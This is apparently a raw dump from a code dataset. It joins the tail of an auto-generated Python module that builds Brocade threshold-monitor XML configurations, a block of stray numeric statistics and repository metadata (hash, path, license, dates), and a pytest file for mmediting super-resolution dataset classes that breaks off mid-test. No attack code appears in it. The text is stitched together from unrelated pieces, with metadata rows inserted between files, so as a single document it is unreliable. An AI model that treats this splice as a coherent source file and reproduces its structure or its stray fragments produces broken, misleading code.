buffer = ET.SubElement(threshold, "buffer")
buffer.text = kwargs.pop('buffer')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def threshold_monitor_hidden_threshold_monitor_interface_policy_area_alert_above_above_highthresh_action(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
threshold_monitor_hidden = ET.SubElement(config, "threshold-monitor-hidden", xmlns="urn:brocade.com:mgmt:brocade-threshold-monitor")
threshold_monitor = ET.SubElement(threshold_monitor_hidden, "threshold-monitor")
interface = ET.SubElement(threshold_monitor, "interface")
policy = ET.SubElement(interface, "policy")
policy_name_key = ET.SubElement(policy, "policy_name")
policy_name_key.text = kwargs.pop('policy_name')
area = ET.SubElement(policy, "area")
type_key = ET.SubElement(area, "type")
type_key.text = kwargs.pop('type')
area_value_key = ET.SubElement(area, "area_value")
area_value_key.text = kwargs.pop('area_value')
alert = ET.SubElement(area, "alert")
above = ET.SubElement(alert, "above")
above_highthresh_action = ET.SubElement(above, "above-highthresh-action")
above_highthresh_action.text = kwargs.pop('above_highthresh_action')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def threshold_monitor_hidden_threshold_monitor_interface_policy_area_alert_above_above_lowthresh_action(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
threshold_monitor_hidden = ET.SubElement(config, "threshold-monitor-hidden", xmlns="urn:brocade.com:mgmt:brocade-threshold-monitor")
threshold_monitor = ET.SubElement(threshold_monitor_hidden, "threshold-monitor")
interface = ET.SubElement(threshold_monitor, "interface")
policy = ET.SubElement(interface, "policy")
policy_name_key = ET.SubElement(policy, "policy_name")
policy_name_key.text = kwargs.pop('policy_name')
area = ET.SubElement(policy, "area")
type_key = ET.SubElement(area, "type")
type_key.text = kwargs.pop('type')
area_value_key = ET.SubElement(area, "area_value")
area_value_key.text = kwargs.pop('area_value')
alert = ET.SubElement(area, "alert")
above = ET.SubElement(alert, "above")
above_lowthresh_action = ET.SubElement(above, "above-lowthresh-action")
above_lowthresh_action.text = kwargs.pop('above_lowthresh_action')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def threshold_monitor_hidden_threshold_monitor_interface_policy_area_alert_below_below_highthresh_action(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
threshold_monitor_hidden = ET.SubElement(config, "threshold-monitor-hidden", xmlns="urn:brocade.com:mgmt:brocade-threshold-monitor")
threshold_monitor = ET.SubElement(threshold_monitor_hidden, "threshold-monitor")
interface = ET.SubElement(threshold_monitor, "interface")
policy = ET.SubElement(interface, "policy")
policy_name_key = ET.SubElement(policy, "policy_name")
policy_name_key.text = kwargs.pop('policy_name')
area = ET.SubElement(policy, "area")
type_key = ET.SubElement(area, "type")
type_key.text = kwargs.pop('type')
area_value_key = ET.SubElement(area, "area_value")
area_value_key.text = kwargs.pop('area_value')
alert = ET.SubElement(area, "alert")
below = ET.SubElement(alert, "below")
below_highthresh_action = ET.SubElement(below, "below-highthresh-action")
below_highthresh_action.text = kwargs.pop('below_highthresh_action')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def threshold_monitor_hidden_threshold_monitor_interface_policy_area_alert_below_below_lowthresh_action(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
threshold_monitor_hidden = ET.SubElement(config, "threshold-monitor-hidden", xmlns="urn:brocade.com:mgmt:brocade-threshold-monitor")
threshold_monitor = ET.SubElement(threshold_monitor_hidden, "threshold-monitor")
interface = ET.SubElement(threshold_monitor, "interface")
policy = ET.SubElement(interface, "policy")
policy_name_key = ET.SubElement(policy, "policy_name")
policy_name_key.text = kwargs.pop('policy_name')
area = ET.SubElement(policy, "area")
type_key = ET.SubElement(area, "type")
type_key.text = kwargs.pop('type')
area_value_key = ET.SubElement(area, "area_value")
area_value_key.text = kwargs.pop('area_value')
alert = ET.SubElement(area, "alert")
below = ET.SubElement(alert, "below")
below_lowthresh_action = ET.SubElement(below, "below-lowthresh-action")
below_lowthresh_action.text = kwargs.pop('below_lowthresh_action')
callback = kwargs.pop('callback', self._callback)
return callback(config)
| 52.898442
| 140
| 0.686427
| 9,639
| 84,902
| 5.788775
| 0.006432
| 0.232553
| 0.141941
| 0.100004
| 0.997455
| 0.997455
| 0.997455
| 0.997455
| 0.997455
| 0.997455
| 0
| 0
| 0.196898
| 84,902
| 1,605
| 141
| 52.898442
| 0.818332
| 0.031295
| 0
| 0.996769
| 1
| 0
| 0.187064
| 0.088666
| 0
| 0
| 0
| 0
| 0
| 1
| 0.073506
| false
| 0
| 0.000808
| 0
| 0.147819
| 0
| 0
| 0
| 0
| null | 1
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 9
|
7c343dbf0831a3932d9e96476ae4eb7e75f2113f
| 33,836
|
py
|
Python
|
tests/test_data/test_datasets/test_sr_dataset.py
|
orangeccc/mmediting
|
d59249682bbbfa391b4051e4e46b9cdedef94dfe
|
[
"Apache-2.0"
] | 1
|
2021-07-20T08:20:04.000Z
|
2021-07-20T08:20:04.000Z
|
tests/test_data/test_datasets/test_sr_dataset.py
|
orangeccc/mmediting
|
d59249682bbbfa391b4051e4e46b9cdedef94dfe
|
[
"Apache-2.0"
] | null | null | null |
tests/test_data/test_datasets/test_sr_dataset.py
|
orangeccc/mmediting
|
d59249682bbbfa391b4051e4e46b9cdedef94dfe
|
[
"Apache-2.0"
] | 2
|
2021-12-26T16:23:09.000Z
|
2021-12-28T03:44:10.000Z
|
from pathlib import Path
from unittest.mock import patch
import numpy as np
import pytest
from mmcv.utils.testing import assert_dict_has_keys
from mmedit.datasets import (BaseSRDataset, SRAnnotationDataset,
SRFacialLandmarkDataset, SRFolderDataset,
SRFolderGTDataset, SRFolderMultipleGTDataset,
SRFolderRefDataset, SRFolderVideoDataset,
SRLmdbDataset, SRREDSDataset,
SRREDSMultipleGTDataset, SRTestMultipleGTDataset,
SRVid4Dataset, SRVimeo90KDataset,
SRVimeo90KMultipleGTDataset)
def mock_open(*args, **kwargs):
"""unittest.mock_open wrapper.
unittest.mock_open doesn't support iteration. Wrap it to fix this bug.
Reference: https://stackoverflow.com/a/41656192
"""
import unittest
f_open = unittest.mock.mock_open(*args, **kwargs)
f_open.return_value.__iter__ = lambda self: iter(self.readline, '')
return f_open
class TestSRDatasets:
@classmethod
def setup_class(cls):
cls.data_prefix = Path(__file__).parent.parent.parent / 'data'
def test_base_super_resolution_dataset(self):
class ToyDataset(BaseSRDataset):
"""Toy dataset for testing SRDataset."""
def __init__(self, pipeline, test_mode=False):
super().__init__(pipeline, test_mode)
def load_annotations(self):
pass
def __len__(self):
return 2
toy_dataset = ToyDataset(pipeline=[])
file_paths = ['gt/baboon.png', 'lq/baboon_x4.png']
file_paths = [str(self.data_prefix / v) for v in file_paths]
result = toy_dataset.scan_folder(self.data_prefix)
assert set(file_paths).issubset(set(result))
result = toy_dataset.scan_folder(str(self.data_prefix))
assert set(file_paths).issubset(set(result))
with pytest.raises(TypeError):
toy_dataset.scan_folder(123)
# test evaluate function
results = [{
'eval_result': {
'PSNR': 20,
'SSIM': 0.6
}
}, {
'eval_result': {
'PSNR': 30,
'SSIM': 0.8
}
}]
with pytest.raises(TypeError):
# results must be a list
toy_dataset.evaluate(results=5)
with pytest.raises(AssertionError):
# The length of results should be equal to the dataset len
toy_dataset.evaluate(results=[results[0]])
eval_results = toy_dataset.evaluate(results=results)
assert eval_results == {'PSNR': 25, 'SSIM': 0.7}
with pytest.raises(AssertionError):
results = [{
'eval_result': {
'PSNR': 20,
'SSIM': 0.6
}
}, {
'eval_result': {
'PSNR': 30
}
}]
# Length of evaluation result should be the same as the dataset len
toy_dataset.evaluate(results=results)
def test_sr_annotation_dataset(self):
# setup
anno_file_path = self.data_prefix / 'train.txt'
sr_pipeline = [
dict(type='LoadImageFromFile', io_backend='disk', key='lq'),
dict(type='LoadImageFromFile', io_backend='disk', key='gt'),
dict(type='PairedRandomCrop', gt_patch_size=128),
dict(type='ImageToTensor', keys=['lq', 'gt'])
]
target_keys = [
'lq_path', 'gt_path', 'scale', 'lq', 'lq_ori_shape', 'gt',
'gt_ori_shape'
]
# input path is Path object
sr_annotation_dataset = SRAnnotationDataset(
lq_folder=self.data_prefix / 'lq',
gt_folder=self.data_prefix / 'gt',
ann_file=anno_file_path,
pipeline=sr_pipeline,
scale=4,
filename_tmpl='{}_x4')
data_infos = sr_annotation_dataset.data_infos
assert data_infos == [
dict(
lq_path=str(self.data_prefix / 'lq' / 'baboon_x4.png'),
gt_path=str(self.data_prefix / 'gt' / 'baboon.png'))
]
result = sr_annotation_dataset[0]
assert (len(sr_annotation_dataset) == 1)
assert assert_dict_has_keys(result, target_keys)
# input path is str
sr_annotation_dataset = SRAnnotationDataset(
lq_folder=str(self.data_prefix / 'lq'),
gt_folder=str(self.data_prefix / 'gt'),
ann_file=str(anno_file_path),
pipeline=sr_pipeline,
scale=4,
filename_tmpl='{}_x4')
data_infos = sr_annotation_dataset.data_infos
assert data_infos == [
dict(
lq_path=str(self.data_prefix / 'lq' / 'baboon_x4.png'),
gt_path=str(self.data_prefix / 'gt' / 'baboon.png'))
]
result = sr_annotation_dataset[0]
assert (len(sr_annotation_dataset) == 1)
assert assert_dict_has_keys(result, target_keys)
def test_sr_folder_dataset(self):
# setup
sr_pipeline = [
dict(type='LoadImageFromFile', io_backend='disk', key='lq'),
dict(type='LoadImageFromFile', io_backend='disk', key='gt'),
dict(type='PairedRandomCrop', gt_patch_size=128),
dict(type='ImageToTensor', keys=['lq', 'gt'])
]
target_keys = ['lq_path', 'gt_path', 'scale', 'lq', 'gt']
lq_folder = self.data_prefix / 'lq'
gt_folder = self.data_prefix / 'gt'
filename_tmpl = '{}_x4'
# input path is Path object
sr_folder_dataset = SRFolderDataset(
lq_folder=lq_folder,
gt_folder=gt_folder,
pipeline=sr_pipeline,
scale=4,
filename_tmpl=filename_tmpl)
data_infos = sr_folder_dataset.data_infos
assert data_infos == [
dict(
lq_path=str(lq_folder / 'baboon_x4.png'),
gt_path=str(gt_folder / 'baboon.png'))
]
result = sr_folder_dataset[0]
assert (len(sr_folder_dataset) == 1)
assert assert_dict_has_keys(result, target_keys)
# input path is str
sr_folder_dataset = SRFolderDataset(
lq_folder=str(lq_folder),
gt_folder=str(gt_folder),
pipeline=sr_pipeline,
scale=4,
filename_tmpl=filename_tmpl)
data_infos = sr_folder_dataset.data_infos
assert data_infos == [
dict(
lq_path=str(lq_folder / 'baboon_x4.png'),
gt_path=str(gt_folder / 'baboon.png'))
]
result = sr_folder_dataset[0]
assert (len(sr_folder_dataset) == 1)
assert assert_dict_has_keys(result, target_keys)
def test_sr_folder_gt_dataset(self):
# setup
sr_pipeline = [
dict(type='LoadImageFromFile', io_backend='disk', key='gt'),
dict(type='ImageToTensor', keys=['gt'])
]
target_keys = ['gt_path', 'gt']
gt_folder = self.data_prefix / 'gt'
filename_tmpl = '{}_x4'
# input path is Path object
sr_folder_dataset = SRFolderGTDataset(
gt_folder=gt_folder,
pipeline=sr_pipeline,
scale=4,
filename_tmpl=filename_tmpl)
data_infos = sr_folder_dataset.data_infos
assert data_infos == [dict(gt_path=str(gt_folder / 'baboon.png'))]
result = sr_folder_dataset[0]
assert (len(sr_folder_dataset) == 1)
assert assert_dict_has_keys(result, target_keys)
# input path is str
sr_folder_dataset = SRFolderGTDataset(
gt_folder=str(gt_folder),
pipeline=sr_pipeline,
scale=4,
filename_tmpl=filename_tmpl)
data_infos = sr_folder_dataset.data_infos
assert data_infos == [dict(gt_path=str(gt_folder / 'baboon.png'))]
result = sr_folder_dataset[0]
assert (len(sr_folder_dataset) == 1)
assert assert_dict_has_keys(result, target_keys)
def test_sr_folder_ref_dataset(self):
# setup
sr_pipeline = [
dict(type='LoadImageFromFile', io_backend='disk', key='lq'),
dict(type='LoadImageFromFile', io_backend='disk', key='gt'),
dict(type='LoadImageFromFile', io_backend='disk', key='ref'),
dict(type='PairedRandomCrop', gt_patch_size=128),
dict(type='ImageToTensor', keys=['lq', 'gt', 'ref'])
]
target_keys = [
'lq_path', 'gt_path', 'ref_path', 'scale', 'lq', 'gt', 'ref'
]
lq_folder = self.data_prefix / 'lq'
gt_folder = self.data_prefix / 'gt'
ref_folder = self.data_prefix / 'gt'
filename_tmpl = '{}_x4'
# input path is Path object
sr_folder_ref_dataset = SRFolderRefDataset(
lq_folder=lq_folder,
gt_folder=gt_folder,
ref_folder=str(ref_folder),
pipeline=sr_pipeline,
scale=4,
filename_tmpl_lq=filename_tmpl)
data_infos = sr_folder_ref_dataset.data_infos
assert data_infos == [
dict(
lq_path=str(lq_folder / 'baboon_x4.png'),
gt_path=str(gt_folder / 'baboon.png'),
ref_path=str(ref_folder / 'baboon.png'))
]
result = sr_folder_ref_dataset[0]
assert len(sr_folder_ref_dataset) == 1
assert assert_dict_has_keys(result, target_keys)
# input path is str
sr_folder_ref_dataset = SRFolderRefDataset(
lq_folder=str(lq_folder),
gt_folder=str(gt_folder),
ref_folder=str(ref_folder),
pipeline=sr_pipeline,
scale=4,
filename_tmpl_lq=filename_tmpl)
data_infos = sr_folder_ref_dataset.data_infos
assert data_infos == [
dict(
lq_path=str(lq_folder / 'baboon_x4.png'),
gt_path=str(gt_folder / 'baboon.png'),
ref_path=str(ref_folder / 'baboon.png'))
]
result = sr_folder_ref_dataset[0]
assert len(sr_folder_ref_dataset) == 1
assert assert_dict_has_keys(result, target_keys)
with pytest.raises(AssertionError):
sr_folder_ref_dataset = SRFolderRefDataset(
lq_folder=str(lq_folder),
gt_folder=str(self.data_prefix / 'image'), # fake gt_folder
ref_folder=str(ref_folder),
pipeline=sr_pipeline,
scale=4,
filename_tmpl_lq=filename_tmpl)
with pytest.raises(AssertionError):
sr_folder_ref_dataset = SRFolderRefDataset(
lq_folder=str(self.data_prefix / 'image'), # fake lq_folder
gt_folder=str(gt_folder),
ref_folder=str(ref_folder),
pipeline=sr_pipeline,
scale=4,
filename_tmpl_lq=filename_tmpl)
with pytest.raises(AssertionError):
sr_folder_ref_dataset = SRFolderRefDataset(
lq_folder=str(lq_folder),
gt_folder=str(self.data_prefix / 'bg'), # fake gt_folder
ref_folder=str(ref_folder),
pipeline=sr_pipeline,
scale=4,
filename_tmpl_lq=filename_tmpl)
with pytest.raises(AssertionError):
sr_folder_ref_dataset = SRFolderRefDataset(
lq_folder=str(self.data_prefix / 'bg'), # fake lq_folder
gt_folder=str(gt_folder),
ref_folder=str(ref_folder),
pipeline=sr_pipeline,
scale=4,
filename_tmpl_lq=filename_tmpl)
with pytest.raises(AssertionError):
sr_folder_ref_dataset = SRFolderRefDataset(
lq_folder=None,
gt_folder=None,
ref_folder=str(ref_folder),
pipeline=sr_pipeline,
scale=4,
filename_tmpl_lq=filename_tmpl)
def test_sr_landmark_dataset(self):
# setup
sr_pipeline = [
dict(
type='LoadImageFromFile',
io_backend='disk',
key='gt',
flag='color',
channel_order='rgb',
backend='cv2')
]
target_keys = ['gt_path', 'bbox', 'shape', 'landmark']
gt_folder = self.data_prefix / 'face'
ann_file = self.data_prefix / 'facemark_ann.npy'
# input path is Path object
sr_landmark_dataset = SRFacialLandmarkDataset(
gt_folder=gt_folder,
ann_file=ann_file,
pipeline=sr_pipeline,
scale=4)
data_infos = sr_landmark_dataset.data_infos
assert len(data_infos) == 1
result = sr_landmark_dataset[0]
assert len(sr_landmark_dataset) == 1
assert assert_dict_has_keys(result, target_keys)
# input path is str
sr_landmark_dataset = SRFacialLandmarkDataset(
gt_folder=str(gt_folder),
ann_file=str(ann_file),
pipeline=sr_pipeline,
scale=4)
data_infos = sr_landmark_dataset.data_infos
assert len(data_infos) == 1
result = sr_landmark_dataset[0]
assert len(sr_landmark_dataset) == 1
assert assert_dict_has_keys(result, target_keys)
def test_sr_lmdb_dataset(self):
# setup
lq_lmdb_folder = self.data_prefix / 'lq.lmdb'
sr_pipeline = [
dict(
type='LoadImageFromFile',
io_backend='lmdb',
key='lq',
db_path=lq_lmdb_folder),
dict(
type='LoadImageFromFile',
io_backend='lmdb',
key='gt',
db_path=lq_lmdb_folder),
dict(type='ImageToTensor', keys=['lq', 'gt'])
]
target_keys = [
'lq_path', 'gt_path', 'scale', 'lq', 'lq_ori_shape', 'gt',
'gt_ori_shape'
]
# input path is Path object
sr_lmdb_dataset = SRLmdbDataset(
lq_folder=lq_lmdb_folder,
gt_folder=lq_lmdb_folder, # fake gt_folder
pipeline=sr_pipeline,
scale=1)
data_infos = sr_lmdb_dataset.data_infos
assert data_infos == [dict(lq_path='baboon', gt_path='baboon')]
result = sr_lmdb_dataset[0]
assert (len(sr_lmdb_dataset) == 1)
assert assert_dict_has_keys(result, target_keys)
# input path is str
sr_lmdb_dataset = SRLmdbDataset(
lq_folder=str(lq_lmdb_folder),
gt_folder=(lq_lmdb_folder), # fake gt_folder
pipeline=sr_pipeline,
scale=1)
data_infos = sr_lmdb_dataset.data_infos
assert data_infos == [dict(lq_path='baboon', gt_path='baboon')]
result = sr_lmdb_dataset[0]
assert (len(sr_lmdb_dataset) == 1)
assert assert_dict_has_keys(result, target_keys)
with pytest.raises(ValueError):
sr_lmdb_dataset = SRLmdbDataset(
lq_folder=self.data_prefix, # normal folder
gt_folder=lq_lmdb_folder, # fake gt_folder
pipeline=sr_pipeline,
scale=1)
with pytest.raises(ValueError):
sr_lmdb_dataset = SRLmdbDataset(
lq_folder=str(self.data_prefix), # normal folder
gt_folder=lq_lmdb_folder, # fake gt_folder
pipeline=sr_pipeline,
scale=1)
with pytest.raises(ValueError):
sr_lmdb_dataset = SRLmdbDataset(
lq_folder=lq_lmdb_folder,
gt_folder=self.data_prefix, # normal folder
pipeline=sr_pipeline,
scale=1)
with pytest.raises(ValueError):
sr_lmdb_dataset = SRLmdbDataset(
lq_folder=lq_lmdb_folder,
gt_folder=str(self.data_prefix), # normal folder
pipeline=sr_pipeline,
scale=1)
def test_reds_dataset():
root_path = Path(__file__).parent.parent.parent / 'data'
txt_content = ('000/00000001.png (720, 1280, 3)\n'
'001/00000001.png (720, 1280, 3)\n'
'250/00000001.png (720, 1280, 3)\n')
mocked_open_function = mock_open(read_data=txt_content)
with patch('builtins.open', mocked_open_function):
# official val partition
reds_dataset = SRREDSDataset(
lq_folder=root_path,
gt_folder=root_path,
ann_file='fake_ann_file',
num_input_frames=5,
pipeline=[],
scale=4,
val_partition='official',
test_mode=False)
assert reds_dataset.data_infos == [
dict(
lq_path=str(root_path),
gt_path=str(root_path),
key='000/00000001',
max_frame_num=100,
num_input_frames=5),
dict(
lq_path=str(root_path),
gt_path=str(root_path),
key='001/00000001',
max_frame_num=100,
num_input_frames=5)
]
# REDS4 val partition
reds_dataset = SRREDSDataset(
lq_folder=root_path,
gt_folder=root_path,
ann_file='fake_ann_file',
num_input_frames=5,
pipeline=[],
scale=4,
val_partition='REDS4',
test_mode=False)
assert reds_dataset.data_infos == [
dict(
lq_path=str(root_path),
gt_path=str(root_path),
key='001/00000001',
max_frame_num=100,
num_input_frames=5),
dict(
lq_path=str(root_path),
gt_path=str(root_path),
key='250/00000001',
max_frame_num=100,
num_input_frames=5)
]
with pytest.raises(ValueError):
# wrong val_partitaion
reds_dataset = SRREDSDataset(
lq_folder=root_path,
gt_folder=root_path,
ann_file='fake_ann_file',
num_input_frames=5,
pipeline=[],
scale=4,
val_partition='wrong_val_partition',
test_mode=False)
with pytest.raises(AssertionError):
# num_input_frames should be odd numbers
reds_dataset = SRREDSDataset(
lq_folder=root_path,
gt_folder=root_path,
ann_file='fake_ann_file',
num_input_frames=6,
pipeline=[],
scale=4,
val_partition='wrong_val_partition',
test_mode=False)
# test mode
# official val partition
reds_dataset = SRREDSDataset(
lq_folder=root_path,
gt_folder=root_path,
ann_file='fake_ann_file',
num_input_frames=5,
pipeline=[],
scale=4,
val_partition='official',
test_mode=True)
assert reds_dataset.data_infos == [
dict(
lq_path=str(root_path),
gt_path=str(root_path),
key='250/00000001',
max_frame_num=100,
num_input_frames=5)
]
# REDS4 val partition
reds_dataset = SRREDSDataset(
lq_folder=root_path,
gt_folder=root_path,
ann_file='fake_ann_file',
num_input_frames=5,
pipeline=[],
scale=4,
val_partition='REDS4',
test_mode=True)
assert reds_dataset.data_infos == [
dict(
lq_path=str(root_path),
gt_path=str(root_path),
key='000/00000001',
max_frame_num=100,
num_input_frames=5)
]
def test_vimeo90k_dataset():
root_path = Path(__file__).parent.parent.parent / 'data'
txt_content = ('00001/0266 (256, 448, 3)\n00002/0268 (256, 448, 3)\n')
mocked_open_function = mock_open(read_data=txt_content)
lq_paths_1 = [
str(root_path / '00001' / '0266' / f'im{v}.png') for v in range(1, 8)
]
gt_paths_1 = [str(root_path / '00001' / '0266' / 'im4.png')]
lq_paths_2 = [
str(root_path / '00002' / '0268' / f'im{v}.png') for v in range(1, 8)
]
gt_paths_2 = [str(root_path / '00002' / '0268' / 'im4.png')]
with patch('builtins.open', mocked_open_function):
vimeo90k_dataset = SRVimeo90KDataset(
lq_folder=root_path,
gt_folder=root_path,
ann_file='fake_ann_file',
num_input_frames=7,
pipeline=[],
scale=4,
test_mode=False)
assert vimeo90k_dataset.data_infos == [
dict(lq_path=lq_paths_1, gt_path=gt_paths_1, key='00001/0266'),
dict(lq_path=lq_paths_2, gt_path=gt_paths_2, key='00002/0268')
]
with pytest.raises(AssertionError):
# num_input_frames should be odd numbers
vimeo90k_dataset = SRVimeo90KDataset(
lq_folder=root_path,
gt_folder=root_path,
ann_file='fake_ann_file',
num_input_frames=6,
pipeline=[],
scale=4,
test_mode=False)
def test_vid4_dataset():
root_path = Path(__file__).parent.parent.parent / 'data'
txt_content = ('calendar 1 (320,480,3)\ncity 2 (320,480,3)\n')
mocked_open_function = mock_open(read_data=txt_content)
with patch('builtins.open', mocked_open_function):
vid4_dataset = SRVid4Dataset(
lq_folder=root_path / 'lq',
gt_folder=root_path / 'gt',
ann_file='fake_ann_file',
num_input_frames=5,
pipeline=[],
scale=4,
test_mode=False,
metric_average_mode='clip',
filename_tmpl='{:08d}')
assert vid4_dataset.data_infos == [
dict(
lq_path=str(root_path / 'lq'),
gt_path=str(root_path / 'gt'),
key='calendar/00000000',
num_input_frames=5,
max_frame_num=1),
dict(
lq_path=str(root_path / 'lq'),
gt_path=str(root_path / 'gt'),
key='city/00000000',
num_input_frames=5,
max_frame_num=2),
dict(
lq_path=str(root_path / 'lq'),
gt_path=str(root_path / 'gt'),
key='city/00000001',
num_input_frames=5,
max_frame_num=2),
]
# test evaluate function ('clip' mode)
results = [{
'eval_result': {
'PSNR': 21,
'SSIM': 0.75
}
}, {
'eval_result': {
'PSNR': 22,
'SSIM': 0.8
}
}, {
'eval_result': {
'PSNR': 24,
'SSIM': 0.9
}
}]
eval_results = vid4_dataset.evaluate(results)
np.testing.assert_almost_equal(eval_results['PSNR'], 22)
np.testing.assert_almost_equal(eval_results['SSIM'], 0.8)
# test evaluate function ('all' mode)
vid4_dataset = SRVid4Dataset(
lq_folder=root_path / 'lq',
gt_folder=root_path / 'gt',
ann_file='fake_ann_file',
num_input_frames=5,
pipeline=[],
scale=4,
test_mode=False,
metric_average_mode='all',
filename_tmpl='{:08d}')
eval_results = vid4_dataset.evaluate(results)
np.testing.assert_almost_equal(eval_results['PSNR'], 22.3333333)
np.testing.assert_almost_equal(eval_results['SSIM'], 0.81666666)
with pytest.raises(AssertionError):
# num_input_frames should be odd numbers
SRVid4Dataset(
lq_folder=root_path,
gt_folder=root_path,
ann_file='fake_ann_file',
num_input_frames=6,
pipeline=[],
scale=4,
test_mode=False)
with pytest.raises(ValueError):
# metric_average_mode can only be either 'folder' or 'all'
SRVid4Dataset(
lq_folder=root_path,
gt_folder=root_path,
ann_file='fake_ann_file',
num_input_frames=5,
pipeline=[],
scale=4,
metric_average_mode='abc',
test_mode=False)
with pytest.raises(TypeError):
# results must be a list
vid4_dataset.evaluate(results=5)
with pytest.raises(AssertionError):
# The length of results should be equal to the dataset len
vid4_dataset.evaluate(results=[results[0]])
def test_sr_reds_multiple_gt_dataset():
root_path = Path(__file__).parent.parent.parent / 'data'
# official val partition
reds_dataset = SRREDSMultipleGTDataset(
lq_folder=root_path,
gt_folder=root_path,
num_input_frames=15,
pipeline=[],
scale=4,
val_partition='official',
test_mode=False)
assert len(reds_dataset.data_infos) == 240 # 240 training clips
assert reds_dataset.data_infos[0] == dict(
lq_path=str(root_path),
gt_path=str(root_path),
key='000',
sequence_length=100,
num_input_frames=15)
# REDS4 val partition
reds_dataset = SRREDSMultipleGTDataset(
lq_folder=root_path,
gt_folder=root_path,
num_input_frames=20,
pipeline=[],
scale=4,
val_partition='REDS4',
test_mode=False)
assert len(reds_dataset.data_infos) == 266 # 266 training clips
assert reds_dataset.data_infos[0] == dict(
lq_path=str(root_path),
gt_path=str(root_path),
key='001',
sequence_length=100,
num_input_frames=20) # 000 is been removed
with pytest.raises(ValueError):
# wrong val_partitaion
reds_dataset = SRREDSMultipleGTDataset(
lq_folder=root_path,
gt_folder=root_path,
num_input_frames=5,
pipeline=[],
scale=4,
val_partition='wrong_val_partition',
test_mode=False)
# test mode
# official val partition
reds_dataset = SRREDSMultipleGTDataset(
lq_folder=root_path,
gt_folder=root_path,
num_input_frames=5,
pipeline=[],
scale=4,
val_partition='official',
test_mode=True)
assert len(reds_dataset.data_infos) == 30 # 30 test clips
assert reds_dataset.data_infos[0] == dict(
lq_path=str(root_path),
gt_path=str(root_path),
key='240',
sequence_length=100,
num_input_frames=5)
# REDS4 val partition
reds_dataset = SRREDSMultipleGTDataset(
lq_folder=root_path,
gt_folder=root_path,
num_input_frames=5,
pipeline=[],
scale=4,
val_partition='REDS4',
test_mode=True)
assert len(reds_dataset.data_infos) == 4 # 4 test clips
assert reds_dataset.data_infos[1] == dict(
lq_path=str(root_path),
gt_path=str(root_path),
key='011',
sequence_length=100,
num_input_frames=5)
def test_sr_vimeo90k_mutiple_gt_dataset():
root_path = Path(__file__).parent.parent.parent / 'data/vimeo90k'
txt_content = ('00001/0266 (256,448,3)\n')
mocked_open_function = mock_open(read_data=txt_content)
lq_paths = [
str(root_path / '00001' / '0266' / f'im{v}.png') for v in range(1, 8)
]
gt_paths = [
str(root_path / '00001' / '0266' / f'im{v}.png') for v in range(1, 8)
]
with patch('builtins.open', mocked_open_function):
vimeo90k_dataset = SRVimeo90KMultipleGTDataset(
lq_folder=root_path,
gt_folder=root_path,
ann_file='fake_ann_file',
pipeline=[],
scale=4,
test_mode=False)
assert vimeo90k_dataset.data_infos == [
dict(lq_path=lq_paths, gt_path=gt_paths, key='00001/0266')
]
def test_sr_test_multiple_gt_dataset():
root_path = Path(__file__).parent.parent.parent / 'data/test_multiple_gt'
test_dataset = SRTestMultipleGTDataset(
lq_folder=root_path,
gt_folder=root_path,
pipeline=[],
scale=4,
test_mode=True)
assert test_dataset.data_infos == [
dict(
lq_path=str(root_path),
gt_path=str(root_path),
key='sequence_1',
sequence_length=2),
dict(
lq_path=str(root_path),
gt_path=str(root_path),
key='sequence_2',
sequence_length=1)
]
def test_sr_folder_multiple_gt_dataset():
root_path = Path(__file__).parent.parent.parent / 'data/test_multiple_gt'
# test without num_input_frames
test_dataset = SRFolderMultipleGTDataset(
lq_folder=root_path,
gt_folder=root_path,
pipeline=[],
scale=4,
test_mode=True)
assert test_dataset.data_infos == [
dict(
lq_path=str(root_path),
gt_path=str(root_path),
key='sequence_1',
num_input_frames=2,
sequence_length=2),
dict(
lq_path=str(root_path),
gt_path=str(root_path),
key='sequence_2',
num_input_frames=1,
sequence_length=1)
]
# test with num_input_frames
test_dataset = SRFolderMultipleGTDataset(
lq_folder=root_path,
gt_folder=root_path,
pipeline=[],
scale=4,
num_input_frames=1,
test_mode=True)
assert test_dataset.data_infos == [
dict(
lq_path=str(root_path),
gt_path=str(root_path),
key='sequence_1',
num_input_frames=1,
sequence_length=2),
dict(
lq_path=str(root_path),
gt_path=str(root_path),
key='sequence_2',
num_input_frames=1,
sequence_length=1)
]
# num_input_frames must be a positive integer
with pytest.raises(ValueError):
SRFolderMultipleGTDataset(
lq_folder=root_path,
gt_folder=root_path,
pipeline=[],
scale=4,
num_input_frames=-1,
test_mode=True)
def test_sr_folder_video_dataset():
root_path = Path(__file__).parent.parent.parent / 'data/test_multiple_gt'
test_dataset = SRFolderVideoDataset(
lq_folder=root_path,
gt_folder=root_path,
num_input_frames=5,
pipeline=[],
scale=4,
test_mode=True)
assert test_dataset.data_infos == [
dict(
lq_path=str(root_path),
gt_path=str(root_path),
key='sequence_1/00000000',
num_input_frames=5,
max_frame_num=2),
dict(
lq_path=str(root_path),
gt_path=str(root_path),
key='sequence_1/00000001',
num_input_frames=5,
max_frame_num=2),
dict(
lq_path=str(root_path),
gt_path=str(root_path),
key='sequence_2/00000000',
num_input_frames=5,
max_frame_num=1),
]
# test evaluate function ('clip' mode)
test_dataset = SRFolderVideoDataset(
lq_folder=root_path,
gt_folder=root_path,
num_input_frames=5,
pipeline=[],
scale=4,
metric_average_mode='clip',
test_mode=True)
results = [{
'eval_result': {
'PSNR': 21,
'SSIM': 0.75
}
}, {
'eval_result': {
'PSNR': 23,
'SSIM': 0.85
}
}, {
'eval_result': {
'PSNR': 24,
'SSIM': 0.9
}
}]
eval_results = test_dataset.evaluate(results)
np.testing.assert_almost_equal(eval_results['PSNR'], 23)
np.testing.assert_almost_equal(eval_results['SSIM'], 0.85)
# test evaluate function ('all' mode)
test_dataset = SRFolderVideoDataset(
lq_folder=root_path,
gt_folder=root_path,
num_input_frames=5,
pipeline=[],
scale=4,
metric_average_mode='all',
test_mode=True)
eval_results = test_dataset.evaluate(results)
